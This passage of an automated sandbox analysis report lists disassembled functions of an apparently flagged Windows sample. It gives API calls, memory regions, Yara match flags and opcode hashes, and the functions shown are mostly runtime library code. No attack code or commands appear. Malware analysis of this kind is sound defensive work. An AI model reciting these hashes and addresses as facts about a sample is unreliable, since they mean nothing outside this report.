                                                              • Associated: 00000000.00000002.2954315683.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.2954333339.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: Process$CurrentExitTerminate
                                                              • String ID:
                                                              • API String ID: 1703294689-0
                                                              • Opcode ID: 25e154c42a67dcf87d00edb929b2d1476c3327d7ef7788f8d8e64d02c0ecb1df
                                                              • Instruction ID: 146749da7bea6e31057676a24497a7e39fcb2650f4e844f2ac51073fb5c6c599
                                                              • Opcode Fuzzy Hash: 25e154c42a67dcf87d00edb929b2d1476c3327d7ef7788f8d8e64d02c0ecb1df
                                                              • Instruction Fuzzy Hash: 02E08631404589EFEF069F10CD4CA993B69FB442C2B008024F50D8A135CB7AEDD1CB41
                                                              Function 0217092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: .$GetProcAddress.$l
                                                              • API String ID: 0-2784972518
                                                              • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                              • Instruction ID: fc65ee4557ce3a06967f569c6f1e3da226a254f70847c988c3dfd9cad9991834
                                                              • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                              • Instruction Fuzzy Hash: 783148B6950709DFDB10CF99C880AAEBBF9FF88324F15404AD845A7210D7B1EA45CBA4
                                                              Function 02185B67 Relevance: 3.4, APIs: 2, Instructions: 450COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b390e4a2b809fc06d578254b51388bdd5f5ff6b6fff1ef8d4aef897508a94667
                                                              • Instruction ID: 41dbf83b6d38bf42d01598055f78bf91d19f7dfe74ffc9340570a5ec758d219a
                                                              • Opcode Fuzzy Hash: b390e4a2b809fc06d578254b51388bdd5f5ff6b6fff1ef8d4aef897508a94667
                                                              • Instruction Fuzzy Hash: 48F11D71E41219AFDF14DFA8C8C06ADFBB2EF48314F668269D915AB344D731A901CF90
                                                              Function 0218C4EA Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,?,?,?,0218C4E5,?,?,?,?,?,?,00000000), ref: 0218C717
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ExceptionRaise
                                                              • String ID:
                                                              • API String ID: 3997070919-0
                                                              • Opcode ID: 35b87f2179ce3c14b148e0892ddb5654e8e708f91f8d94a5ba77404dfe27ae65
                                                              • Instruction ID: bf09f6f8877a70d81981681e270736e2b636ea1d5f95e6ea3c57d1aed67af7cd
                                                              • Opcode Fuzzy Hash: 35b87f2179ce3c14b148e0892ddb5654e8e708f91f8d94a5ba77404dfe27ae65
                                                              • Instruction Fuzzy Hash: BAB138712506098FDB18DF28C4C6A657BE1FF45368F25865AE89ACF2A1C335E981CF90
                                                              Function 0041C283 Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0041C27E,?,?,00000008,?,?,004251AB,00000000), ref: 0041C4B0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: ExceptionRaise
                                                              • String ID:
                                                              • API String ID: 3997070919-0
                                                              • Opcode ID: 35b87f2179ce3c14b148e0892ddb5654e8e708f91f8d94a5ba77404dfe27ae65
                                                              • Instruction ID: 1e207280c519bced7d66c8b67978bc6121a932d59d727fe0a847cf8d2cc13a62
                                                              • Opcode Fuzzy Hash: 35b87f2179ce3c14b148e0892ddb5654e8e708f91f8d94a5ba77404dfe27ae65
                                                              • Instruction Fuzzy Hash: C2B14C31650608DFD714CF28C8C6BA67BA1FF45364F258659E89ACF3A1C339E992CB44
                                                              Function 1000E184 Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,1000E17F,?,?,00000008,?,?,1000DE14,00000000), ref: 1000E3B1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2954294685.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000000.00000002.2954274750.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.2954315683.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.2954333339.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: ExceptionRaise
                                                              • String ID:
                                                              • API String ID: 3997070919-0
                                                              • Opcode ID: d9cad4c0d431712b17d678ca3744fd01f07566361e254315dc393335121516ed
                                                              • Instruction ID: 1a3fbdf84673f95942c1f426381f735e0c8de5aa42652e790f36daf84cbc2009
                                                              • Opcode Fuzzy Hash: d9cad4c0d431712b17d678ca3744fd01f07566361e254315dc393335121516ed
                                                              • Instruction Fuzzy Hash: 9CB14A31610649CFE715CF28C486B997BE0FF453A4F258658E89ADF2A5C335EE82CB40
                                                              Function 0040D9B3 Relevance: 1.6, APIs: 1, Instructions: 144COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0040D9C9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: FeaturePresentProcessor
                                                              • String ID:
                                                              • API String ID: 2325560087-0
                                                              • Opcode ID: aa7d9029003f00ab9a07ca4a3ca600b7b925c7310fdfda5886337471c3949cde
                                                              • Instruction ID: e83c888262e5176c2e399b2cb9a20f8e3507fb01a93416a2cee5b457c32b1697
                                                              • Opcode Fuzzy Hash: aa7d9029003f00ab9a07ca4a3ca600b7b925c7310fdfda5886337471c3949cde
                                                              • Instruction Fuzzy Hash: 5C515DB2E143098BDB28CF94D9857AABBF4FB48310F24857AD405EB391E3789944CF58
                                                              Function 02191760 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0218908A: GetLastError.KERNEL32(021720FF,?,02172103,021816D8,?,021720FF,004280A0,?,0218933A,00000000,004280A0,00000000,00000000,021720FF), ref: 0218908F
                                                                • Part of subcall function 0218908A: SetLastError.KERNEL32(00000000,00437188,000000FF,?,0218933A,00000000,004280A0,00000000,00000000,021720FF), ref: 0218912D
                                                                • Part of subcall function 0218908A: _free.LIBCMT ref: 021890EC
                                                                • Part of subcall function 0218908A: _free.LIBCMT ref: 02189122
                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 021917B4
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorLast_free$InfoLocale
                                                              • String ID:
                                                              • API String ID: 2003897158-0
                                                              • Opcode ID: c057830d9f955838873051aea3cb367ccca586cb99bd1b8caf0ec7dac73f1eb9
                                                              • Instruction ID: a4cd9825cf9086a1db48a173adc0e7e0dd82e67eac053e64591d5d7335fdae68
                                                              • Opcode Fuzzy Hash: c057830d9f955838873051aea3cb367ccca586cb99bd1b8caf0ec7dac73f1eb9
                                                              • Instruction Fuzzy Hash: C121C272690207BFEF28AF25DC81ABA73A9FF44314B14407AED0AD6140EB35E980DF50
                                                              Function 004214F9 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00418E23: GetLastError.KERNEL32(00401E98,?,00401E9C,00411471,?,00401E98,74DEDF80,?,004190D3,00000000,74DEDF80,00000000,00000000,00401E98), ref: 00418E28
                                                                • Part of subcall function 00418E23: SetLastError.KERNEL32(00000000,00000008,000000FF,?,004190D3,00000000,74DEDF80,00000000,00000000,00401E98), ref: 00418EC6
                                                                • Part of subcall function 00418E23: _free.LIBCMT ref: 00418E85
                                                                • Part of subcall function 00418E23: _free.LIBCMT ref: 00418EBB
                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0042154D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast_free$InfoLocale
                                                              • String ID:
                                                              • API String ID: 2003897158-0
                                                              • Opcode ID: 3034b70ca8a59bcd1a54a412746b10e778b5baf9d18adb7accf15c2e8f28c0ec
                                                              • Instruction ID: 0a4d2d06c034290d104409f0a8c1658b3f82e5bad43bf4f1fbb2ccba27987c0f
                                                              • Opcode Fuzzy Hash: 3034b70ca8a59bcd1a54a412746b10e778b5baf9d18adb7accf15c2e8f28c0ec
                                                              • Instruction Fuzzy Hash: 1421B671714216BBDF289B15EC81EBB33A8EF94314B5001BFF902D6251EB399E818A58
                                                              Function 021913E7 Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0218908A: GetLastError.KERNEL32(021720FF,?,02172103,021816D8,?,021720FF,004280A0,?,0218933A,00000000,004280A0,00000000,00000000,021720FF), ref: 0218908F
                                                                • Part of subcall function 0218908A: SetLastError.KERNEL32(00000000,00437188,000000FF,?,0218933A,00000000,004280A0,00000000,00000000,021720FF), ref: 0218912D
                                                              • EnumSystemLocalesW.KERNEL32(004212A6,00000001,00000000,?,-00000050,?,02191B3B,00000000,?,?,?,00000055,?), ref: 02191459
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorLast$EnumLocalesSystem
                                                              • String ID:
                                                              • API String ID: 2417226690-0
                                                              • Opcode ID: 8e528c0da2a2a4483534ddf9075a4fd2e7139669a6f630b31fcbe4f79ce78334
                                                              • Instruction ID: c3d5976aa5228d0becfeb539948c5c904878a23d4e27312ccdc9b099aaf5c3d5
                                                              • Opcode Fuzzy Hash: 8e528c0da2a2a4483534ddf9075a4fd2e7139669a6f630b31fcbe4f79ce78334
                                                              • Instruction Fuzzy Hash: B011C236244702AFDF189F3998917BAB792FB85758B14842DEA8A87A40D771B583CB40
                                                              Function 00421180 Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00418E23: GetLastError.KERNEL32(00401E98,?,00401E9C,00411471,?,00401E98,74DEDF80,?,004190D3,00000000,74DEDF80,00000000,00000000,00401E98), ref: 00418E28
                                                                • Part of subcall function 00418E23: SetLastError.KERNEL32(00000000,00000008,000000FF,?,004190D3,00000000,74DEDF80,00000000,00000000,00401E98), ref: 00418EC6
                                                              • EnumSystemLocalesW.KERNEL32(004212A6,00000001,00000000,?,-00000050,?,004218D4,00000000,?,?,?,00000055,?), ref: 004211F2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$EnumLocalesSystem
                                                              • String ID:
                                                              • API String ID: 2417226690-0
                                                              • Opcode ID: 8e528c0da2a2a4483534ddf9075a4fd2e7139669a6f630b31fcbe4f79ce78334
                                                              • Instruction ID: 1a156f0733b9bda999ead150ec1823f2d34610307ed71135a7bf92de471f7001
                                                              • Opcode Fuzzy Hash: 8e528c0da2a2a4483534ddf9075a4fd2e7139669a6f630b31fcbe4f79ce78334
                                                              • Instruction Fuzzy Hash: 951129363003019FDB189F79D8916BABB91FF94318B58442EE64687750E7756943C744
                                                              Function 0219198C Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0218908A: GetLastError.KERNEL32(021720FF,?,02172103,021816D8,?,021720FF,004280A0,?,0218933A,00000000,004280A0,00000000,00000000,021720FF), ref: 0218908F
                                                                • Part of subcall function 0218908A: SetLastError.KERNEL32(00000000,00437188,000000FF,?,0218933A,00000000,004280A0,00000000,00000000,021720FF), ref: 0218912D
                                                              • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,02191729,00000000,00000000,?), ref: 021919B8
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorLast$InfoLocale
                                                              • String ID:
                                                              • API String ID: 3736152602-0
                                                              • Opcode ID: 1139729f0d8f3faab7eaca461a639108405b5028be2395062180b67052449781
                                                              • Instruction ID: 67dbdb7cb31aa97e3bf9866bdffa814e190012ea116f433077c377375391ddee
                                                              • Opcode Fuzzy Hash: 1139729f0d8f3faab7eaca461a639108405b5028be2395062180b67052449781
                                                              • Instruction Fuzzy Hash: 5DF0A9366801177FDF285F65CC45BBB7759EB40758F154429DC4AA3180EB74FE82CA90
                                                              Function 00421725 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00418E23: GetLastError.KERNEL32(00401E98,?,00401E9C,00411471,?,00401E98,74DEDF80,?,004190D3,00000000,74DEDF80,00000000,00000000,00401E98), ref: 00418E28
                                                                • Part of subcall function 00418E23: SetLastError.KERNEL32(00000000,00000008,000000FF,?,004190D3,00000000,74DEDF80,00000000,00000000,00401E98), ref: 00418EC6
                                                              • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,004214C2,00000000,00000000,?), ref: 00421751
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$InfoLocale
                                                              • String ID:
                                                              • API String ID: 3736152602-0
                                                              • Opcode ID: 1139729f0d8f3faab7eaca461a639108405b5028be2395062180b67052449781
                                                              • Instruction ID: 555e0e489eff99157af98c992298e2a68b21b4fc6b2928ebd806db451c2e11da
                                                              • Opcode Fuzzy Hash: 1139729f0d8f3faab7eaca461a639108405b5028be2395062180b67052449781
                                                              • Instruction Fuzzy Hash: 38F04932700121BBDB245B20DC05BBB37A8EBC0314F45042AEC02A3290DA38FD42D694
                                                              Function 02191482 Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0218908A: GetLastError.KERNEL32(021720FF,?,02172103,021816D8,?,021720FF,004280A0,?,0218933A,00000000,004280A0,00000000,00000000,021720FF), ref: 0218908F
                                                                • Part of subcall function 0218908A: SetLastError.KERNEL32(00000000,00437188,000000FF,?,0218933A,00000000,004280A0,00000000,00000000,021720FF), ref: 0218912D
                                                              • EnumSystemLocalesW.KERNEL32(004214F9,00000001,00000001,?,-00000050,?,02191AFF,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 021914CC
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorLast$EnumLocalesSystem
                                                              • String ID:
                                                              • API String ID: 2417226690-0
                                                              • Opcode ID: 6fac6c021882376c9bbe75fd1d3f35105e289d3445d4e4c8521c9975bb8101d4
                                                              • Instruction ID: 4a14fe7169eeef3f1d2f2b00d9353a7fcff72a9ab1be7b46e3d9b1a7651ab299
                                                              • Opcode Fuzzy Hash: 6fac6c021882376c9bbe75fd1d3f35105e289d3445d4e4c8521c9975bb8101d4
                                                              • Instruction Fuzzy Hash: 5CF046363803056FDF246F39DC80B7A7BD5EF85728F04802DFA094B680C7B1A842CA00
                                                              Function 0042121B Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00418E23: GetLastError.KERNEL32(00401E98,?,00401E9C,00411471,?,00401E98,74DEDF80,?,004190D3,00000000,74DEDF80,00000000,00000000,00401E98), ref: 00418E28
                                                                • Part of subcall function 00418E23: SetLastError.KERNEL32(00000000,00000008,000000FF,?,004190D3,00000000,74DEDF80,00000000,00000000,00401E98), ref: 00418EC6
                                                              • EnumSystemLocalesW.KERNEL32(004214F9,00000001,00000001,?,-00000050,?,00421898,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 00421265
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$EnumLocalesSystem
                                                              • String ID:
                                                              • API String ID: 2417226690-0
                                                              • Opcode ID: 6fac6c021882376c9bbe75fd1d3f35105e289d3445d4e4c8521c9975bb8101d4
                                                              • Instruction ID: 14f67bad7a4cfcfa4ee4bc3d5db6401a72568cf36d7e4a3035cac00d244dbeff
                                                              • Opcode Fuzzy Hash: 6fac6c021882376c9bbe75fd1d3f35105e289d3445d4e4c8521c9975bb8101d4
                                                              • Instruction Fuzzy Hash: 92F04C323003049FDB245F35EC81B7B7B95FF80368B44446EF605876A0C6B55C42C614
                                                              Function 02189996 Relevance: 1.5, APIs: 1, Instructions: 33COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 02185210: RtlEnterCriticalSection.NTDLL(?), ref: 0218521F
                                                              • EnumSystemLocalesW.KERNEL32(00419722,00000001,004356C0,0000000C,02189D57,?), ref: 021899CE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CriticalEnterEnumLocalesSectionSystem
                                                              • String ID:
                                                              • API String ID: 1272433827-0
                                                              • Opcode ID: 68f9fd4353d092257d8faacbfb28b6082a3244547ec3c47aa70ea1475b86d789
                                                              • Instruction ID: 55229895f7635a1e7a0f88a692f9cff92d3b17b25382989084a035a52837f175
                                                              • Opcode Fuzzy Hash: 68f9fd4353d092257d8faacbfb28b6082a3244547ec3c47aa70ea1475b86d789
                                                              • Instruction Fuzzy Hash: 47F04976A94305DFD714EF98E882BAD77F1EB08721F20412AE5149B3E0DB7959408F58
                                                              Function 0041972F Relevance: 1.5, APIs: 1, Instructions: 33COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00414FA9: EnterCriticalSection.KERNEL32(?,?,004165C0,00000000,00435520,0000000C,00416587,?,?,004196BE,?,?,00418FC5,00000001,00000364,00000008), ref: 00414FB8
                                                              • EnumSystemLocalesW.KERNEL32(00419722,00000001,004356C0,0000000C,00419AF0,00000000), ref: 00419767
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: CriticalEnterEnumLocalesSectionSystem
                                                              • String ID:
                                                              • API String ID: 1272433827-0
                                                              • Opcode ID: 68f9fd4353d092257d8faacbfb28b6082a3244547ec3c47aa70ea1475b86d789
                                                              • Instruction ID: cedf4b0542652410236bfbe7b93f0e3d125763c36bf37d7ca1942f65020527f8
                                                              • Opcode Fuzzy Hash: 68f9fd4353d092257d8faacbfb28b6082a3244547ec3c47aa70ea1475b86d789
                                                              • Instruction Fuzzy Hash: AEF03276A14204DFE714EF98E852B9CB7B0EB48725F20402FF5189B2E0CB7999808F58
                                                              Function 0219139C Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0218908A: GetLastError.KERNEL32(021720FF,?,02172103,021816D8,?,021720FF,004280A0,?,0218933A,00000000,004280A0,00000000,00000000,021720FF), ref: 0218908F
                                                                • Part of subcall function 0218908A: SetLastError.KERNEL32(00000000,00437188,000000FF,?,0218933A,00000000,004280A0,00000000,00000000,021720FF), ref: 0218912D
                                                              • EnumSystemLocalesW.KERNEL32(0042108E,00000001,00000001,?,?,02191B5D,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 021913D3
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorLast$EnumLocalesSystem
                                                              • String ID:
                                                              • API String ID: 2417226690-0
                                                              • Opcode ID: 8bb4e4ca8e02dc3f9042754c392158079bf37807a7981d48a91552c6d213624d
                                                              • Instruction ID: 412a2d1f89329653af3ce318ae2d52d045508de82aedab0580497ec6043c9bd1
                                                              • Opcode Fuzzy Hash: 8bb4e4ca8e02dc3f9042754c392158079bf37807a7981d48a91552c6d213624d
                                                              • Instruction Fuzzy Hash: C8F0553634020567CF14AF35D88577A7FA4EFC1720B064058EA098BA90C7B2A983CB90
                                                              Function 00421135 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00418E23: GetLastError.KERNEL32(00401E98,?,00401E9C,00411471,?,00401E98,74DEDF80,?,004190D3,00000000,74DEDF80,00000000,00000000,00401E98), ref: 00418E28
                                                                • Part of subcall function 00418E23: SetLastError.KERNEL32(00000000,00000008,000000FF,?,004190D3,00000000,74DEDF80,00000000,00000000,00401E98), ref: 00418EC6
                                                              • EnumSystemLocalesW.KERNEL32(0042108E,00000001,00000001,?,?,004218F6,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 0042116C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$EnumLocalesSystem
                                                              • String ID:
                                                              • API String ID: 2417226690-0
                                                              • Opcode ID: 8bb4e4ca8e02dc3f9042754c392158079bf37807a7981d48a91552c6d213624d
                                                              • Instruction ID: e5017fa5d0c691943728d275092cb8a263cd523bacd6dc2a7f3d241a18a3b7dc
                                                              • Opcode Fuzzy Hash: 8bb4e4ca8e02dc3f9042754c392158079bf37807a7981d48a91552c6d213624d
                                                              • Instruction Fuzzy Hash: 6CF0553A30020557CB149F39E84577A7FA0EFC5714B46405EEB098B2A0C6799883C798
                                                              Function 02189E5B Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,021887E5,?,20001004,00000000,00000002,?,?,02187DF2), ref: 02189E8F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: InfoLocale
                                                              • String ID:
                                                              • API String ID: 2299586839-0
                                                              • Opcode ID: 8ec4a8ccac36f94d5fb742d1bdb748f86e068ed4b8c627be13f1f3e7e8dff0aa
                                                              • Instruction ID: 5562e227153bc92ca84eb892ead9a1a0687a3c4fbee632d312b3f6ea0be52ed0
                                                              • Opcode Fuzzy Hash: 8ec4a8ccac36f94d5fb742d1bdb748f86e068ed4b8c627be13f1f3e7e8dff0aa
                                                              • Instruction Fuzzy Hash: 2EE04F3264121CBBDF123F60DC48ABE3E1AEF44760F144024FC0965360DF3289229ED4
                                                              Function 00419BF4 Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,0041857E,?,20001004,00000000,00000002,?,?,00417B8B), ref: 00419C28
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: InfoLocale
                                                              • String ID:
                                                              • API String ID: 2299586839-0
                                                              • Opcode ID: fbb0bd12f0dadb61687aff6c97eb42df5c7e0ff724206f946788ad3c9e0e9366
                                                              • Instruction ID: 917ba661290b8a4deb7db836a8ac3b69315417969e7b9d4f32c12ff31b6cd56c
                                                              • Opcode Fuzzy Hash: fbb0bd12f0dadb61687aff6c97eb42df5c7e0ff724206f946788ad3c9e0e9366
                                                              • Instruction Fuzzy Hash: 8FE0DF3110411CBBCF123F21EC04EEE3F5AEF44720F004026FC0022261CB358DA2AAD9
                                                              Function 0217DBB0 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetUnhandledExceptionFilter.KERNEL32(0040D955,0217D752), ref: 0217DBB5
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
